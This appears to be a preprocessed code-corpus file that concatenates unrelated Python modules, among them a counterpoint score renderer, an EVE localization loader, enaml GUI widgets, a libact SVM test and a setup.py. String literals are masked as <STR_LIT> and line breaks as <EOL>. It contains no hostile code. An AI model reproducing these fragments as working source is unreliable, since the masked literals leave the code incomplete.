, '<STR_LIT:\x00>' * stream . MAX_RPAYLOAD_LEN , <EOL> '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN - <NUM_LIT:1> ) ] ) <EOL> def tearDown ( self ) : <EOL> self . log_patch . stop ( ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from string import Template <EOL> SPECIES_DURATION = { <EOL> <NUM_LIT:1> : <NUM_LIT:1> , <EOL> <NUM_LIT:2> : <NUM_LIT:2> , <EOL> <NUM_LIT:3> : <NUM_LIT:4> , <EOL> } <EOL> TEMPLATE = """<STR_LIT>""" <EOL> NOTES = { <EOL> <NUM_LIT:1> : "<STR_LIT:g>" , <EOL> <NUM_LIT:2> : "<STR_LIT:a>" , <EOL> <NUM_LIT:3> : "<STR_LIT:b>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT:r>" , <EOL> } <EOL> def get_cantus_firmus ( notes ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = NOTES [ normalised [ <NUM_LIT:0> ] ] + '<STR_LIT>' <EOL> result += '<STR_LIT:U+0020>' . join ( [ NOTES [ note ] for note in normalised [ <NUM_LIT:1> : ] ] ) <EOL> result += '<STR_LIT>' <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def get_simple_contrapunctus ( notes , duration ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = NOTES [ normalised [ <NUM_LIT:0> ] ] + '<STR_LIT>' % duration <EOL> result += '<STR_LIT:U+0020>' . join ( [ NOTES [ note ] for note in normalised [ <NUM_LIT:1> : - <NUM_LIT:2> ] ] ) <EOL> final_note = normalised . pop ( ) <EOL> penultimate_note = normalised . pop ( ) <EOL> next_note = NOTES [ penultimate_note ] <EOL> if final_note == penultimate_note + <NUM_LIT:1> : <EOL> if final_note not in [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> ] : <EOL> next_note = next_note [ <NUM_LIT:0> ] + '<STR_LIT>' + next_note [ <NUM_LIT:1> : ] <EOL> result += '<STR_LIT:U+0020>' + next_note <EOL> result += '<STR_LIT:U+0020>' + NOTES [ final_note ] <EOL> if duration != <NUM_LIT:1> : <EOL> result += '<STR_LIT>' <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def get_fourth_species ( notes ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = '<STR_LIT>' <EOL> body = [ NOTES [ note ] for note in normalised [ : - <NUM_LIT:2> ] ] <EOL> for pitch in body : <EOL> result += '<STR_LIT>' % ( pitch , pitch ) <EOL> final_note = normalised . pop ( ) <EOL> penultimate_note = normalised . pop ( ) <EOL> next_note = NOTES [ penultimate_note ] <EOL> if final_note == penultimate_note + <NUM_LIT:1> : <EOL> if final_note not in [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> ] : <EOL> next_note = next_note [ <NUM_LIT:0> ] + '<STR_LIT>' + next_note [ <NUM_LIT:1> : ] <EOL> result += '<STR_LIT:U+0020>' + next_note <EOL> result += '<STR_LIT>' % ( NOTES [ final_note ] ) <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def render ( species , cantus_firmus , contrapunctus , title = '<STR_LIT>' , <EOL> created_on = None , composer = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not created_on : <EOL> created_on = datetime . datetime . today ( ) <EOL> contrapunctus_notes = '<STR_LIT>' <EOL> if species < <NUM_LIT:4> : <EOL> duration = SPECIES_DURATION [ species ] <EOL> contrapunctus_notes = get_simple_contrapunctus ( contrapunctus , duration ) <EOL> elif species == <NUM_LIT:4> : <EOL> contrapunctus_notes = get_fourth_species ( contrapunctus ) <EOL> context = { } <EOL> context [ '<STR_LIT:title>' ] = title <EOL> context [ '<STR_LIT>' ] = created_on . strftime ( '<STR_LIT>' ) <EOL> context [ '<STR_LIT>' ] = composer <EOL> context [ '<STR_LIT>' ] = contrapunctus_notes <EOL> context [ '<STR_LIT>' ] = get_cantus_firmus ( cantus_firmus ) <EOL> if context [ '<STR_LIT>' ] and context [ '<STR_LIT>' ] : <EOL> score = Template ( TEMPLATE ) <EOL> return score . substitute ( context ) <EOL> else : <EOL> return '<STR_LIT>' </s>
<s> from . version import get_version <EOL> __version__ = get_version ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import cPickle <EOL> import gc <EOL> debug = False <EOL> class BasePropertyHandler ( object ) : <EOL> __id__ = <NUM_LIT:10> <EOL> def __init__ ( self , localizationInstance , cfgInstance ) : <EOL> self . cfg = cfgInstance <EOL> self . localization = localizationInstance <EOL> def default ( self , value , languageID , ** kwargs ) : <EOL> return value <EOL> class MessageIDPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:5> <EOL> def default ( self , value , languageID , ** kwargs ) : <EOL> return self . localization . GetByMessageID ( value , languageID ) <EOL> class LocationPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:3> <EOL> def name ( self , locationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . evelocations . Get ( locationID ) . locationName or '<STR_LIT:None>' <EOL> def rawName ( self , locationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . evelocations . Get ( locationID ) . GetRawName ( languageID ) <EOL> class ItemPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:2> <EOL> def name ( self , itemID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . invtypes . Get ( itemID ) . typeName or '<STR_LIT:None>' <EOL> def rawName ( self , itemID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . invtypes . Get ( itemID ) . GetRawName ( languageID ) <EOL> class NpcOrganizationPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:1> <EOL> def name ( self , npcOrganizationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . eveowners . Get ( npcOrganizationID ) . name <EOL> def rawName ( self , npcOrganizationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . eveowners . Get ( npcOrganizationID ) . GetRawName ( languageID ) <EOL> class NumericPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:9> <EOL> class Localization ( object ) : <EOL> def __init__ ( self , eve , languageID = "<STR_LIT>" , cfgInstance = None ) : <EOL> self . cfg = cfgInstance or cfg <EOL> self . _propertyHandlers = { } <EOL> for cls in globals ( ) . itervalues ( ) : <EOL> if isinstance ( cls , type ) and issubclass ( cls , BasePropertyHandler ) : <EOL> self . _propertyHandlers [ cls . __id__ ] = cls ( self , cfgInstance ) <EOL> res = eve . ResFile ( ) <EOL> def _loadlanguage ( languageID ) : <EOL> x , data = cPickle . loads ( res . Open ( "<STR_LIT>" % languageID ) . read ( ) ) <EOL> data . update ( cPickle . loads ( res . Open ( "<STR_LIT>" % languageID ) . read ( ) ) [ <NUM_LIT:1> ] ) <EOL> return data <EOL> self . languageID = languageID <EOL> self . primary = _loadlanguage ( languageID ) <EOL> if languageID != "<STR_LIT>" : <EOL> self . fallback = _loadlanguage ( "<STR_LIT>" ) <EOL> else : <EOL> self . fallback = None <EOL> self . languageLabels = { } <EOL> for resname in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) : <EOL> unPickledObject = cPickle . loads ( res . Open ( resname ) . read ( ) ) <EOL> for messageID , dataRow in unPickledObject [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fp = dataRow [ '<STR_LIT>' ] <EOL> label = fp + '<STR_LIT:/>' + dataRow [ '<STR_LIT:label>' ] if fp else dataRow [ '<STR_LIT:label>' ] <EOL> self . languageLabels [ label . encode ( '<STR_LIT:ascii>' ) ] = messageID <EOL> del unPickledObject <EOL> gc . collect ( ) <EOL> def _format ( self , fmt , param , languageID ) : <EOL> raw , noclue , tokens = fmt <EOL> try : <EOL> for token , data in tokens . iteritems ( ) : <EOL> handler = self . _propertyHandlers [ data [ '<STR_LIT>' ] ] <EOL> getter = getattr ( handler , data [ '<STR_LIT>' ] or "<STR_LIT:default>" ) <EOL> replacement = getter ( param [ data [ '<STR_LIT>' ] ] , languageID , ** data [ '<STR_LIT>' ] ) <EOL> raw = raw . replace ( token , unicode ( replacement ) ) <EOL> except KeyError : <EOL> if debug : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , token <EOL> print "<STR_LIT>" , data <EOL> print "<STR_LIT>" , param <EOL> print "<STR_LIT>" , raw <EOL> raise <EOL> return raw <EOL> def GetByMessageID ( self , messageID , languageID = None , ** kwarg ) : <EOL> if messageID is None : <EOL> return "<STR_LIT>" <EOL> tr = self . primary . get ( messageID , False ) <EOL> if tr == False and self . fallback : <EOL> tr = self . fallback . get ( messageID ) <EOL> if tr : <EOL> if kwarg or tr [ <NUM_LIT:2> ] : <EOL> return self . _format ( tr , kwarg , languageID ) <EOL> return tr [ <NUM_LIT:0> ] <EOL> return "<STR_LIT>" % ( messageID , kwarg ) <EOL> def GetByLabel ( self , label , languageID = None , ** kwarg ) : <EOL> try : <EOL> messageID = self . languageLabels [ label ] <EOL> except KeyError : <EOL> return '<STR_LIT>' % label <EOL> return self . GetByMessageID ( messageID , languageID , ** kwarg ) <EOL> GetImportantByMessageID = GetByMessageID <EOL> GetImportantByLabel = GetByLabel </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from numpy . testing import assert_array_equal <EOL> from sklearn import datasets <EOL> from sklearn . cross_validation import train_test_split <EOL> from sklearn . svm import SVC <EOL> from libact . base . dataset import Dataset <EOL> from libact . models import SVM <EOL> class SVMIrisTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> iris = datasets . load_iris ( ) <EOL> X = iris . data <EOL> y = iris . target <EOL> self . X_train , self . X_test , self . y_train , self . y_test = train_test_split ( X , y , test_size = <NUM_LIT> , random_state = <NUM_LIT> ) <EOL> def test_SVM ( self ) : <EOL> svc_clf = SVC ( ) <EOL> svc_clf . fit ( self . X_train , self . y_train ) <EOL> svm = SVM ( ) <EOL> svm . train ( Dataset ( self . X_train , self . y_train ) ) <EOL> assert_array_equal ( <EOL> svc_clf . predict ( self . X_train ) , svm . predict ( self . X_train ) ) <EOL> assert_array_equal ( <EOL> svc_clf . predict ( self . X_test ) , svm . predict ( self . X_test ) ) <EOL> self . assertEqual ( <EOL> svc_clf . score ( self . X_train , self . y_train ) , <EOL> svm . score ( Dataset ( self . X_train , self . y_train ) ) ) <EOL> self . assertEqual ( <EOL> svc_clf . score ( self . X_test , self . y_test ) , <EOL> svm . score ( Dataset ( self . X_test , self . y_test ) ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from contextlib import contextmanager <EOL> from atom . api import Atom , Bool , Str , Tuple , Typed , ForwardTyped <EOL> from atom . datastructures . api import sortedmap <EOL> from . expression_engine import ExpressionEngine <EOL> __stack = [ ] <EOL> __map = { } <EOL> @ contextmanager <EOL> def new_scope ( key , seed = None ) : <EOL> """<STR_LIT>""" <EOL> if seed is not None : <EOL> scope = seed . copy ( ) <EOL> else : <EOL> scope = sortedmap ( ) <EOL> __map [ key ] = scope <EOL> __stack . append ( scope ) <EOL> yield scope <EOL> __stack . pop ( ) <EOL> del __map [ key ] <EOL> def peek_scope ( ) : <EOL> """<STR_LIT>""" <EOL> return __stack [ - <NUM_LIT:1> ] <EOL> def fetch_scope ( key ) : <EOL> """<STR_LIT>""" <EOL> return __map [ key ] <EOL> class CompilerNode ( Atom ) : <EOL> """<STR_LIT>""" <EOL> scope_key = Typed ( object ) <EOL> children = Typed ( list , ( ) ) <EOL> id_nodes = Typed ( sortedmap ) <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> self . id_nodes = mapping <EOL> for child in self . children : <EOL> child . update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = type ( self ) ( ) <EOL> node . scope_key = self . scope_key <EOL> node . children = [ child . copy ( ) for child in self . children ] <EOL> return node <EOL> class DeclarativeNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> klass = Typed ( type ) <EOL> identifier = Str ( ) <EOL> store_locals = Bool ( False ) <EOL> child_intercept = Bool ( False ) <EOL> engine = Typed ( ExpressionEngine ) <EOL> closure_keys = Typed ( set ) <EOL> super_node = ForwardTyped ( lambda : EnamlDefNode ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> klass = self . klass <EOL> instance = klass . __new__ ( klass ) <EOL> self . populate ( instance ) <EOL> instance . __init__ ( parent ) <EOL> return instance <EOL> def populate ( self , instance ) : <EOL> """<STR_LIT>""" <EOL> if self . super_node is not None : <EOL> self . super_node ( instance ) <EOL> f_locals = peek_scope ( ) <EOL> scope_key = self . scope_key <EOL> if self . identifier : <EOL> f_locals [ self . identifier ] = instance <EOL> if self . store_locals : <EOL> instance . _d_storage [ scope_key ] = f_locals <EOL> if self . engine is not None : <EOL> instance . _d_engine = self . engine <EOL> if self . closure_keys is not None : <EOL> for key in self . closure_keys : <EOL> instance . _d_storage [ key ] = fetch_scope ( key ) <EOL> if self . child_intercept : <EOL> children_copy = self . children [ : ] <EOL> instance . child_node_intercept ( children_copy , scope_key , f_locals ) <EOL> else : <EOL> for node in self . children : <EOL> node ( instance ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> if self . identifier : <EOL> mapping [ self . identifier ] = self <EOL> super ( DeclarativeNode , self ) . update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( DeclarativeNode , self ) . copy ( ) <EOL> node . klass = self . klass <EOL> node . identifier = self . identifier <EOL> node . store_locals = self . store_locals <EOL> node . child_intercept = self . child_intercept <EOL> if self . engine is not None : <EOL> node . engine = self . engine . copy ( ) <EOL> if self . super_node is not None : <EOL> node . super_node = self . super_node . copy ( ) <EOL> if self . closure_keys is not None : <EOL> node . closure_keys = self . closure_keys . copy ( ) <EOL> return node <EOL> class EnamlDefNode ( DeclarativeNode ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , instance ) : <EOL> """<STR_LIT>""" <EOL> with new_scope ( self . scope_key ) : <EOL> self . populate ( instance ) <EOL> def update_id_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> mapping = sortedmap ( ) <EOL> if self . identifier : <EOL> mapping [ self . identifier ] = self <EOL> super ( DeclarativeNode , self ) . update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( EnamlDefNode , self ) . copy ( ) <EOL> node . update_id_nodes ( ) <EOL> return node <EOL> class TemplateNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> scope = Typed ( sortedmap , ( ) ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> instances = [ ] <EOL> with new_scope ( self . scope_key , self . scope ) : <EOL> for node in self . children : <EOL> if isinstance ( node , DeclarativeNode ) : <EOL> instances . append ( node ( parent ) ) <EOL> elif isinstance ( node , TemplateInstanceNode ) : <EOL> instances . extend ( node ( parent ) ) <EOL> return instances <EOL> def update_id_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TemplateNode , self ) . update_id_nodes ( sortedmap ( ) ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return sum ( child . size ( ) for child in self . children ) <EOL> def iternodes ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children : <EOL> if isinstance ( child , DeclarativeNode ) : <EOL> yield child <EOL> elif isinstance ( child , TemplateInstanceNode ) : <EOL> for node in child . iternodes ( ) : <EOL> yield node <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( TemplateNode , self ) . copy ( ) <EOL> node . scope = self . scope <EOL> node . update_id_nodes ( ) <EOL> return node <EOL> class TemplateInstanceNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> template = Typed ( TemplateNode ) <EOL> names = Tuple ( ) <EOL> starname = Str ( ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> instances = self . template ( parent ) <EOL> f_locals = peek_scope ( ) <EOL> if self . names : <EOL> for name , instance in zip ( self . names , instances ) : <EOL> f_locals [ name ] = instance <EOL> if self . starname : <EOL> f_locals [ self . starname ] = tuple ( instances [ len ( self . names ) : ] ) <EOL> return instances <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> if self . names : <EOL> nodeiter = self . iternodes ( ) <EOL> for name in self . names : <EOL> mapping [ name ] = nodeiter . next ( ) <EOL> super ( TemplateInstanceNode , self ) . update_id_nodes ( mapping ) <EOL> def size ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . template . size ( ) <EOL> def iternodes ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . template . iternodes ( ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = super ( TemplateInstanceNode , self ) . copy ( ) <EOL> node . template = self . template . copy ( ) <EOL> node . names = self . names <EOL> node . starname = self . starname <EOL> return node </s>
<s> from . dock_layout import ( <EOL> ItemLayout , TabLayout , SplitLayout , HSplitLayout , VSplitLayout , <EOL> DockBarLayout , AreaLayout , DockLayout , DockLayoutWarning , <EOL> InsertItem , InsertBorderItem , InsertDockBarItem , InsertTab , <EOL> FloatItem , FloatArea , RemoveItem , ExtendItem , RetractItem <EOL> ) <EOL> from . layout_helpers import ( <EOL> align , hbox , vbox , horizontal , vertical , factory , grid , spacer , <EOL> ) <EOL> from . geometry import Box , BoxF , Pos , PosF , Rect , RectF , Size , SizeF </s>
<s> from . import QT_API <EOL> from . QtGui import QFileDialog <EOL> if QT_API == '<STR_LIT>' : <EOL> _STATIC_METHOD_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> else : <EOL> _STATIC_METHOD_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get_file_dialog_exec_func ( mode ) : <EOL> """<STR_LIT>""" <EOL> if mode not in _STATIC_METHOD_NAMES : <EOL> raise ValueError ( "<STR_LIT>" % mode ) <EOL> return getattr ( QFileDialog , _STATIC_METHOD_NAMES [ mode ] ) </s>
<s> from atom . api import Typed <EOL> from enaml . widgets . mpl_canvas import ProxyMPLCanvas <EOL> from matplotlib . backends . backend_qt4agg import FigureCanvasQTAgg <EOL> try : <EOL> from matplotlib . backends . backend_qt4agg import ( NavigationToolbar2QTAgg <EOL> as NavigationToolbar2QT ) <EOL> except ImportError : <EOL> from matplotlib . backends . backend_qt4agg import NavigationToolbar2QT <EOL> from . QtCore import Qt <EOL> from . QtGui import QFrame , QVBoxLayout <EOL> from . qt_control import QtControl <EOL> class QtMPLCanvas ( QtControl , ProxyMPLCanvas ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( QFrame ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = QFrame ( self . parent_widget ( ) ) <EOL> layout = QVBoxLayout ( ) <EOL> layout . setContentsMargins ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> layout . setSpacing ( <NUM_LIT:0> ) <EOL> widget . setLayout ( layout ) <EOL> self . widget = widget <EOL> def init_layout ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( QtMPLCanvas , self ) . init_layout ( ) <EOL> self . _refresh_mpl_widget ( ) <EOL> def set_figure ( self , figure ) : <EOL> """<STR_LIT>""" <EOL> with self . geometry_guard ( ) : <EOL> self . _refresh_mpl_widget ( ) <EOL> def set_toolbar_visible ( self , visible ) : <EOL> """<STR_LIT>""" <EOL> layout = self . widget . layout ( ) <EOL> if layout . count ( ) == <NUM_LIT:2> : <EOL> with self . geometry_guard ( ) : <EOL> toolbar = layout . itemAt ( <NUM_LIT:0> ) . widget ( ) <EOL> toolbar . setVisible ( visible ) <EOL> def _refresh_mpl_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = self . widget <EOL> layout = widget . layout ( ) <EOL> while layout . count ( ) : <EOL> layout_item = layout . takeAt ( <NUM_LIT:0> ) <EOL> layout_item . widget ( ) . deleteLater ( ) <EOL> figure = self . declaration . figure <EOL> if figure : <EOL> canvas = FigureCanvasQTAgg ( figure ) <EOL> canvas . setParent ( widget ) <EOL> canvas . setFocusPolicy ( Qt . ClickFocus ) <EOL> canvas . setVisible ( True ) <EOL> toolbar = NavigationToolbar2QT ( canvas , widget ) <EOL> toolbar . setVisible ( self . declaration . toolbar_visible ) <EOL> layout . addWidget ( toolbar ) <EOL> layout . addWidget ( canvas ) </s>
<s> from datetime import datetime , time as pytime <EOL> from atom . api import Typed , ForwardTyped , observe <EOL> from enaml . core . declarative import d_ <EOL> from . control import Control , ProxyControl <EOL> class ProxyBoundedTime ( ProxyControl ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : BoundedTime ) <EOL> def set_minimum ( self , minimum ) : <EOL> raise NotImplementedError <EOL> def set_maximum ( self , maximum ) : <EOL> raise NotImplementedError <EOL> def set_time ( self , time ) : <EOL> raise NotImplementedError <EOL> class BoundedTime ( Control ) : <EOL> """<STR_LIT>""" <EOL> minimum = d_ ( Typed ( pytime , args = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> maximum = d_ ( Typed ( pytime , args = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> time = d_ ( Typed ( pytime , factory = lambda : datetime . now ( ) . time ( ) ) ) <EOL> proxy = Typed ( ProxyBoundedTime ) <EOL> @ observe ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( BoundedTime , self ) . _update_proxy ( change ) <EOL> def _post_setattr_minimum ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> if new > self . maximum : <EOL> self . maximum = new <EOL> if new > self . time : <EOL> self . time = new <EOL> def _post_setattr_maximum ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> if new < self . minimum : <EOL> self . minimum = new <EOL> if new < self . time : <EOL> self . time = new <EOL> def _post_validate_time ( self , old , new ) : <EOL> """<STR_LIT>""" <EOL> return max ( self . minimum , min ( new , self . maximum ) ) </s>
<s> from atom . api import Bool , Typed , ForwardTyped , Unicode , observe <EOL> from enaml . core . declarative import d_ <EOL> from . action import Action <EOL> from . action_group import ActionGroup <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> class ProxyMenu ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Menu ) <EOL> def set_title ( self , title ) : <EOL> raise NotImplementedError <EOL> def set_enabled ( self , enabled ) : <EOL> raise NotImplementedError <EOL> def set_visible ( self , visible ) : <EOL> raise NotImplementedError <EOL> def set_context_menu ( self , context ) : <EOL> raise NotImplementedError <EOL> def popup ( self ) : <EOL> raise NotImplementedError <EOL> def close ( self ) : <EOL> raise NotImplementedError <EOL> class Menu ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> title = d_ ( Unicode ( ) ) <EOL> enabled = d_ ( Bool ( True ) ) <EOL> visible = d_ ( Bool ( True ) ) <EOL> context_menu = d_ ( Bool ( False ) ) <EOL> proxy = Typed ( ProxyMenu ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> allowed = ( Action , ActionGroup , Menu ) <EOL> return [ c for c in self . children if isinstance ( c , allowed ) ] <EOL> @ observe ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Menu , self ) . _update_proxy ( change ) <EOL> def popup ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_initialized : <EOL> self . initialize ( ) <EOL> if not self . proxy_is_active : <EOL> self . activate_proxy ( ) <EOL> self . proxy . popup ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . proxy_is_active : <EOL> self . proxy . close ( ) </s>
<s> from . extension import Extension <EOL> from . extension_point import ExtensionPoint <EOL> from . plugin import Plugin <EOL> from . plugin_manifest import PluginManifest <EOL> from . workbench import Workbench </s>
<s> import sys <EOL> from setuptools import setup , find_packages , Extension <EOL> ext_modules = [ <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) , <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' , <EOL> ) <EOL> ] <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> ext_modules . append ( <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> libraries = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> language = '<STR_LIT>' <EOL> ) <EOL> ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> entry_points = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ext_modules = ext_modules , <EOL> ) </s>
